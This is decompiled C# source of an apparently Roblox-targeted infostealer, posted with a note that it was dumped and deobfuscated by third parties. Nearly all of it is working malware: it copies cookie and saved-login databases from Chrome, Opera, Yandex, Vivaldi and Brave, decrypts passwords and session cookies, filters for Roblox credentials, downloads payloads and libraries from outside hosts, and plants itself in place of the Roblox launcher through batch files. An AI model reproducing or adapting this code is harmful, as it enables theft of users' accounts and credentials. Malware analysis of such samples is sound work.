// Token: 0x06000012 RID: 18 RVA: 0x00003190 File Offset: 0x00001390
private static void smethod_14()
{
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome"))
{
try
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome";
string[] files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories);
foreach (string string_ in files)
{
EntryPointClass.smethod_16(string_);
}
}
catch
{
}
try
{
string path2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome";
string[] files2 = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories);
foreach (string string_2 in files2)
{
EntryPointClass.smethod_17(string_2);
}
}
catch
{
}
}
}
// Token: 0x0600000E RID: 14 RVA: 0x00002F2C File Offset: 0x0000112C
private static void smethod_10(string string_8)
{
EntryPointClass.smethod_11(string_8);
string a = EntryPointClass.smethod_13(EntryPointClass.string_4);
if (a == "null")
{
return;
}
string path = Path.GetTempPath() + "up.txt";
string fileName = Path.GetTempPath() + "update.exe";
try
{
using (StreamWriter streamWriter = new StreamWriter(path, false))
{
streamWriter.WriteLine(EntryPointClass.string_4);
streamWriter.Close();
}
using (WebClient webClient = new WebClient())
{
webClient.Proxy = null;
webClient.DownloadFile("https://csnatcher.rokey.xyz/x/update.bin", fileName);
webClient.Dispose();
}
}
catch
{
}
}
// Token: 0x0600000D RID: 13 RVA: 0x00002D88 File Offset: 0x00000F88
private static void smethod_9(string string_8)
{
if (File.Exists(string_8))
{
string str = EntryPointClass.pPtixUhvH();
string text = EntryPointClass.string_5 + "\\" + str + ".db";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_8, text);
string text2 = string.Format("Data Source={0};Version=3;", text);
try
{
SQLiteConnection sqliteConnection = new SQLiteConnection(text2);
sqliteConnection.Open();
string text3 = "SELECT action_url, username_value, password_value FROM logins;";
SQLiteCommand sqliteCommand = new SQLiteCommand(text3, sqliteConnection);
SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader();
while (sqliteDataReader.Read())
{
string text4 = (string)sqliteDataReader["action_url"];
string text5 = (string)sqliteDataReader["username_value"];
string @string = Encoding.UTF8.GetString(ProtectedData.Unprotect((byte[])sqliteDataReader["password_value"], null, DataProtectionScope.CurrentUser));
string[] array = new string[]
{
string.Concat(new string[]
{
text5,
":!:",
@string,
":!:",
text4
})
};
foreach (string text6 in array)
{
if (text6.Contains("roblox"))
{
EntryPointClass.smethod_10(text6);
}
}
}
sqliteConnection.Close();
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
try
{
File.Delete(text);
}
catch
{
}
}
}
}
// Token: 0x06000015 RID: 21 RVA: 0x000034AC File Offset: 0x000016AC
private static void smethod_17(string string_8)
{
if (File.Exists(string_8))
{
try
{
string str = EntryPointClass.pPtixUhvH();
string text = EntryPointClass.string_5 + "\\" + str + ".db";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_8, text);
string text2 = string.Format("Data Source={0};Journal Mode=Off;", text);
SQLiteConnection sqliteConnection = new SQLiteConnection(text2);
sqliteConnection.Open();
string text3 = "SELECT origin_url, username_value, password_value FROM logins;";
SQLiteCommand sqliteCommand = new SQLiteCommand(text3, sqliteConnection);
SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader();
while (sqliteDataReader.Read())
{
string text4 = (string)sqliteDataReader["origin_url"];
string text5 = (string)sqliteDataReader["username_value"];
byte[] byte_ = (byte[])sqliteDataReader["password_value"];
string text6 = File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Local State");
text6 = JObject.Parse(text6)["os_crypt"]["encrypted_key"].ToString();
byte[] byte_2 = ProtectedData.Unprotect(Convert.FromBase64String(text6).Skip(5).ToArray <byte>(), null, DataProtectionScope.LocalMachine);
string text7 = EntryPointClass.smethod_15(byte_, byte_2, 3);
string[] array = new string[]
{
string.Concat(new string[]
{
text5,
":!:",
text7,
":!:",
text4
})
};
foreach (string text8 in array)
{
if (text8.Contains("roblox"))
{
EntryPointClass.smethod_10(text8);
}
}
}
}
catch
{
}
}
}
// Token: 0x0600000C RID: 12 RVA: 0x00002C7C File Offset: 0x00000E7C
private static void smethod_8(string string_8)
{
if (File.Exists(string_8))
{
string str = EntryPointClass.pPtixUhvH();
string text = EntryPointClass.string_5 + "\\" + str + ".db";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_8, text);
string text2 = string.Format("Data Source={0};", text);
try
{
SQLiteConnection sqliteConnection = new SQLiteConnection(text2);
sqliteConnection.Open();
string text3 = "SELECT encrypted_value FROM cookies;";
SQLiteCommand sqliteCommand = new SQLiteCommand(text3, sqliteConnection);
SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader();
while (sqliteDataReader.Read())
{
string @string = Encoding.UTF8.GetString(ProtectedData.Unprotect((byte[])sqliteDataReader["encrypted_value"], null, DataProtectionScope.CurrentUser));
string[] array = new string[]
{
@string
};
foreach (string text4 in array)
{
if (text4.Contains("_|WARNING:-DO-NOT-SHARE-THIS."))
{
EntryPointClass.smethod_10(text4);
}
}
}
sqliteConnection.Close();
}
catch
{
}
}
}
// Token: 0x06000005 RID: 5 RVA: 0x0000271C File Offset: 0x0000091C
private static void smethod_2()
{
string tempPath = Path.GetTempPath();
string text = Path.Combine(new string[]
{
tempPath + "csupdates.bat"
});
string value = "taskkill /PID /T /F " + Process.GetCurrentProcess().Id;
string value2 = string.Concat(new string[]
{
"XCOPY /Y \"",
Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).ToString(),
"\" \"",
EntryPointClass.string_5,
"\""
});
string value3 = "START /C \"" + EntryPointClass.smethod_0() + "\"";
string value4 = "EXIT";
try
{
if (!File.Exists(text))
{
FileStream fileStream = File.Create(text);
fileStream.Close();
}
using (StreamWriter streamWriter = new StreamWriter(text, false))
{
streamWriter.WriteLine(value);
streamWriter.WriteLine(value2);
streamWriter.WriteLine(value3);
streamWriter.WriteLine(value4);
}
}
catch
{
}
EntryPointClass.MsyUyJaON(text);
}
// Token: 0x06000016 RID: 22 RVA: 0x00003668 File Offset: 0x00001868
private static void smethod_18()
{
EntryPointClass.smethod_12();
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome"))
{
try
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome";
string[] files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories);
foreach (string string_ in files)
{
EntryPointClass.smethod_8(string_);
}
}
catch
{
}
try
{
string path2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome";
string[] files2 = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories);
foreach (string string_2 in files2)
{
EntryPointClass.smethod_9(string_2);
}
}
catch
{
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Roaming\\Opera Software"))
{
try
{
string path3 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Roaming\\Opera Software";
string[] files3 = Directory.GetFiles(path3, "Cookies", SearchOption.AllDirectories);
foreach (string string_3 in files3)
{
EntryPointClass.smethod_8(string_3);
}
}
catch
{
}
try
{
string path4 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Roaming\\Opera Software";
string[] files4 = Directory.GetFiles(path4, "Login Data", SearchOption.AllDirectories);
foreach (string string_4 in files4)
{
EntryPointClass.smethod_9(string_4);
}
}
catch
{
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Yandex"))
{
try
{
string path5 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Yandex";
string[] files5 = Directory.GetFiles(path5, "Cookies", SearchOption.AllDirectories);
foreach (string string_5 in files5)
{
EntryPointClass.smethod_8(string_5);
}
}
catch
{
}
try
{
string path6 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Yandex";
string[] files6 = Directory.GetFiles(path6, "Login Data", SearchOption.AllDirectories);
foreach (string string_6 in files6)
{
EntryPointClass.smethod_9(string_6);
}
}
catch
{
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Vivaldi"))
{
try
{
string path7 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Vivaldi";
string[] files7 = Directory.GetFiles(path7, "Cookies", SearchOption.AllDirectories);
foreach (string string_7 in files7)
{
EntryPointClass.smethod_8(string_7);
}
}
catch
{
}
try
{
string path8 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Vivaldi";
string[] files8 = Directory.GetFiles(path8, "Login Data", SearchOption.AllDirectories);
foreach (string string_8 in files8)
{
EntryPointClass.smethod_9(string_8);
}
}
catch
{
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\BraveSoftware"))
{
try
{
string path9 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\BraveSoftware";
string[] files9 = Directory.GetFiles(path9, "Cookies", SearchOption.AllDirectories);
foreach (string string_9 in files9)
{
EntryPointClass.smethod_8(string_9);
}
}
catch
{
}
try
{
string path10 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\BraveSoftware";
string[] files10 = Directory.GetFiles(path10, "Login Data", SearchOption.AllDirectories);
foreach (string string_10 in files10)
{
EntryPointClass.smethod_9(string_10);
}
}
catch
{
}
}
}
// Token: 0x06000004 RID: 4 RVA: 0x00002428 File Offset: 0x00000628
private static void Main(string[] args)
{
MessageBox.Show("Dumped by icor, deobfuscated by NTAuth. Entry point reached, dont go further if you dont want to get f*****g infected by this sloppy code.");
EntryPointClass.smethod_5();
string text = Path.Combine(EntryPointClass.smethod_6(), "content", "updates");
string text2 = Path.Combine(text, "RobloxPlayerLauncher.exe");
if (Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()) == Path.Combine(EntryPointClass.smethod_6(), "RobloxPlayerLauncher.exe"))
{
EntryPointClass.smethod_10(EntryPointClass.smethod_4(args[0].Split(new char[]
{
':'
})[3].Split(new char[]
{
'+'
})[0]));
new Process
{
StartInfo =
{
Arguments = args[0],
FileName = text2
}
}.Start();
return;
}
if (!Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).Contains("Temp"))
{
if (!Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).Contains("Roblox"))
{
if (!Directory.Exists(EntryPointClass.string_5))
{
try
{
Directory.CreateDirectory(EntryPointClass.string_5);
Directory.CreateDirectory(EntryPointClass.string_5 + "\\x64");
Directory.CreateDirectory(EntryPointClass.string_5 + "\\x86");
}
catch
{
}
}
if (File.Exists(EntryPointClass.string_5 + "\\System.Data.SQLite.dll"))
{
if (File.Exists(EntryPointClass.smethod_0()))
{
File.Delete(EntryPointClass.smethod_0());
}
EntryPointClass.smethod_2();
return;
}
WebClient webClient = new WebClient();
webClient.DownloadFile("https://ixware.biz/cs/1.bin", EntryPointClass.string_5 + "\\EntityFramework.dll");
webClient.DownloadFile("https://ixware.biz/cs/2.bin", EntryPointClass.string_5 + "\\EntityFramework.SqlServer.dll");
webClient.DownloadFile("https://ixware.biz/cs/3.bin", EntryPointClass.string_5 + "\\System.Data.SQLite.dll");
webClient.DownloadFile("https://ixware.biz/cs/4.bin", EntryPointClass.string_5 + "\\System.Data.SQLite.EF6.dll");
webClient.DownloadFile("https://ixware.biz/cs/5.bin", EntryPointClass.string_5 + "\\System.Data.SQLite.Linq.dll");
webClient.DownloadFile("https://ixware.biz/cs/6.bin", EntryPointClass.string_5 + "\\BouncyCastle.Crypto.dll");
webClient.DownloadFile("https://ixware.biz/cs/7.bin", EntryPointClass.string_5 + "\\Newtonsoft.Json.dll");
webClient.DownloadFile("https://ixware.biz/cs/x64.bin", EntryPointClass.string_5 + "\\x64\\SQLite.Interop.dll");
webClient.DownloadFile("https://ixware.biz/cs/x86.bin", EntryPointClass.string_5 + "\\x86\\SQLite.Interop.dll");
webClient.Dispose();
if (!File.Exists(text2) && File.Exists(EntryPointClass.smethod_7()))
{
EntryPointClass.smethod_3(text2, text);
return;
}
EntryPointClass.smethod_2();
return;
}
}
else if (Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()) != Path.Combine(EntryPointClass.smethod_6(), "RobloxPlayerLauncher.exe"))
{
EntryPointClass.smethod_1();
if (EntryPointClass.bool_0)
{
if (EntryPointClass.int_0 >= 80)
{
EntryPointClass.smethod_14();
return;
}
try
{
EntryPointClass.smethod_18();
return;
}
catch
{
return;
}
}
try
{
EntryPointClass.smethod_18();
}
catch
{
EntryPointClass.smethod_14();
}
}
}
// Token: 0x06000006 RID: 6 RVA: 0x00002844 File Offset: 0x00000A44
private static void smethod_3(string string_8, string string_9)
{
string tempPath = Path.GetTempPath();
string text = Path.Combine(new string[]
{
tempPath + "csupdate.bat"
});
string value = "taskkill /PID /T /F " + Process.GetCurrentProcess().Id;
string value2 = string.Concat(new string[]
{
"XCOPY /Y \"",
Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).ToString(),
"\" \"",
EntryPointClass.string_5,
"\""
});
string value3 = string.Concat(new string[]
{
"XCOPY /Y \"",
EntryPointClass.smethod_7(),
"\" \"",
string_9,
"\""
});
string value4 = string.Concat(new string[]
{
"XCOPY /Y \"",
Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).ToString(),
"\" \"",
Path.Combine(EntryPointClass.smethod_6(), "RobloxPlayerLauncher.exe"),
"\""
});
string value5 = "START /C \"" + EntryPointClass.smethod_0() + "\"";
string value6 = "EXIT";
try
{
if (!File.Exists(string_8) && !Directory.Exists(string_9))
{
Directory.CreateDirectory(string_9);
}
}
catch
{
}
try
{
if (!File.Exists(text))
{
FileStream fileStream = File.Create(text);
fileStream.Close();
}
using (StreamWriter streamWriter = new StreamWriter(text, false))
{
streamWriter.WriteLine(value);
streamWriter.WriteLine(value2);
streamWriter.WriteLine(value3);
streamWriter.WriteLine(value4);
streamWriter.WriteLine(value5);
streamWriter.WriteLine(value6);
}
}
catch
{
}
EntryPointClass.MsyUyJaON(text);
}
